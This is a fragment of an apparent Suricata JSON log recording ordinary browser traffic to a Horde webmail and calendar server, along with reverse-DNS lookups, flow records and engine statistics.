{"timestamp":"2020-02-29T00:26:20.129324+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53150,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":10,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidevert-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":87}} {"timestamp":"2020-02-29T00:26:20.153731+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53148,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/dayview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":349},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/dayview.png","state":"CLOSED","stored":false,"size":349,"tx_id":13}} {"timestamp":"2020-02-29T00:26:20.154066+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":14,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742}} 
{"timestamp":"2020-02-29T00:26:20.201408+0000","flow_id":1375831296053952,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":40121,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":24589,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:26:20.234800+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53148,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/favicon.ico","state":"CLOSED","stored":false,"size":1742,"tx_id":14}} {"timestamp":"2020-02-29T00:26:20.309691+0000","flow_id":1375831296053952,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":40121,"proto":"UDP","dns":{"type":"answer","id":24589,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:26:20.309691+0000","flow_id":1375831296053952,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":40121,"proto":"UDP","dns":{"type":"answer","id":24589,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:26:20.364046+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":15,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) 
Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":638}} {"timestamp":"2020-02-29T00:26:20.364046+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":638},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":29,"tx_id":15}} {"timestamp":"2020-02-29T00:26:20.398232+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53148,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":638},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":1692,"tx_id":15}} {"timestamp":"2020-02-29T00:26:20.409015+0000","flow_id":1007619454811575,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":36501,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":64994,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:26:20.418063+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53150,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidevert-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":87},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/slidevert-bg.png","state":"CLOSED","stored":false,"size":87,"tx_id":10}} {"timestamp":"2020-02-29T00:26:20.418385+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53150,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":11,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/loading.gif","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2494}} {"timestamp":"2020-02-29T00:26:20.424480+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53150,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/loading.gif","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2494},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/loading.gif","state":"CLOSED","stored":false,"size":2494,"tx_id":11}} {"timestamp":"2020-02-29T00:26:20.425560+0000","flow_id":1673743112610025,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53154,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/new.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":560},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/new.png","state":"CLOSED","stored":false,"size":560,"tx_id":0}} {"timestamp":"2020-02-29T00:26:20.425832+0000","flow_id":1673743112610025,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53154,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/collapse.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":227}} 
{"timestamp":"2020-02-29T00:26:20.426617+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53150,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":12,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/plus-sidebar.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":515}} {"timestamp":"2020-02-29T00:26:20.427177+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53150,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/plus-sidebar.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":515},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/plus-sidebar.png","state":"CLOSED","stored":false,"size":515,"tx_id":12}} {"timestamp":"2020-02-29T00:26:20.428292+0000","flow_id":1673743112610025,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53154,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/collapse.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":227},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/collapse.png","state":"CLOSED","stored":false,"size":227,"tx_id":1}} {"timestamp":"2020-02-29T00:26:20.434804+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53150,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":13,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/edit-sidebar-fff.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":220}} {"timestamp":"2020-02-29T00:26:20.435318+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53150,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/edit-sidebar-fff.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":220},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/edit-sidebar-fff.png","state":"CLOSED","stored":false,"size":220,"tx_id":13}} {"timestamp":"2020-02-29T00:26:20.442759+0000","flow_id":371298575065439,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53158,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; 
Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":87},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/sidebar-split.png","state":"CLOSED","stored":false,"size":87,"tx_id":6}} {"timestamp":"2020-02-29T00:26:20.469468+0000","flow_id":1673743112610025,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53154,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/checkbox_on.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":477}} {"timestamp":"2020-02-29T00:26:20.477306+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53150,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":14,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/expand.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":234}} {"timestamp":"2020-02-29T00:26:20.517292+0000","flow_id":1007619454811575,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36501,"proto":"UDP","dns":{"type":"answer","id":64994,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:26:20.517292+0000","flow_id":1007619454811575,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36501,"proto":"UDP","dns":{"type":"answer","id":64994,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:26:20.562334+0000","flow_id":1489093878650014,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":45312,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":45910,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:26:20.670412+0000","flow_id":1489093878650014,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45312,"proto":"UDP","dns":{"type":"answer","id":45910,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:26:20.670412+0000","flow_id":1489093878650014,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45312,"proto":"UDP","dns":{"type":"answer","id":45910,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:26:20.697573+0000","flow_id":371298575065439,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53158,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126}} 
{"timestamp":"2020-02-29T00:26:20.697573+0000","flow_id":371298575065439,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":53158,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":137,"tx_id":7}} {"timestamp":"2020-02-29T00:26:20.697674+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":16,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":1142}} {"timestamp":"2020-02-29T00:26:20.697674+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":1142},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":128,"tx_id":16}} 
{"timestamp":"2020-02-29T00:26:25.089026+0000","flow_id":1460171568849225,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53156,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/yearview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":301},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/yearview.png","state":"CLOSED","stored":false,"size":301,"tx_id":2}} {"timestamp":"2020-02-29T00:26:25.431617+0000","flow_id":1673743112610025,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53154,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/checkbox_on.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":477},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/checkbox_on.png","state":"CLOSED","stored":false,"size":477,"tx_id":2}} {"timestamp":"2020-02-29T00:26:25.438988+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53150,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/expand.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":234},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/expand.png","state":"CLOSED","stored":false,"size":234,"tx_id":14}} {"timestamp":"2020-02-29T00:26:25.698314+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53148,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":1142},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":3311,"tx_id":16}} {"timestamp":"2020-02-29T00:26:25.701587+0000","flow_id":371298575065439,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53158,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":115,"tx_id":7}} 
{"timestamp":"2020-02-29T00:26:27.000360+0000","event_type":"stats","stats":{"uptime":15239,"capture":{"kernel_packets":142113,"kernel_drops":0},"decoder":{"pkts":142127,"bytes":97637978,"invalid":195,"ipv4":140532,"ipv6":10,"ethernet":142127,"raw":0,"null":0,"sll":0,"tcp":134944,"udp":5378,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7087840},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2915,"ssn_memcap_drop":0,"pseudo":355,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2931,"synack":2922,"rst":1223,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1921,"ftp":0,"smtp":0,"tls":787,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2460,"failed_udp":116},"tx":{"http":5021,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2544}},"flow_mgr":{"closed_pruned":2893,"new_pruned":17,"est_pruned":2545,"bypassed_pruned":0,"flows_checked":9,"flows_notimeout":8,"flows_timeout":1,"flows_timeout_inuse":1,"flows_removed":0,"rows_checked":65536,"rows_skipped":65527,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":10562,"memcap_state":0,"memcap_global":0},"http":{"memuse":800,"memcap":0}}} 
{"timestamp":"2020-02-29T00:26:27.001155+0000","flow_id":1291220436495971,"event_type":"flow","src_ip":"192.168.10.81","src_port":53136,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":774,"bytes_toclient":709,"start":"2020-02-29T00:25:21.831075+0000","end":"2020-02-29T00:25:26.839931+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:26:27.001644+0000","flow_id":1482449560383490,"event_type":"flow","src_ip":"192.168.10.81","src_port":53138,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":773,"bytes_toclient":767,"start":"2020-02-29T00:25:21.831490+0000","end":"2020-02-29T00:25:26.839893+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:26:27.955857+0000","flow_id":350253235803601,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49429,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":14196,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:26:27.958422+0000","flow_id":1660149541607404,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53162,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tab.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":108}} {"timestamp":"2020-02-29T00:26:28.000774+0000","flow_id":1144869425108000,"event_type":"flow","src_ip":"192.168.10.130","src_port":34292,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":176,"pkts_toclient":348,"bytes_toserver":18553,"bytes_toclient":494833,"start":"2020-02-29T00:25:09.513056+0000","end":"2020-02-29T00:25:25.099949+0000","age":16,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:26:28.064141+0000","flow_id":350253235803601,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49429,"proto":"UDP","dns":{"type":"answer","id":14196,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:26:28.064141+0000","flow_id":350253235803601,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49429,"proto":"UDP","dns":{"type":"answer","id":14196,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:26:28.111618+0000","flow_id":467437123496173,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53160,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listTopTags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":122}} 
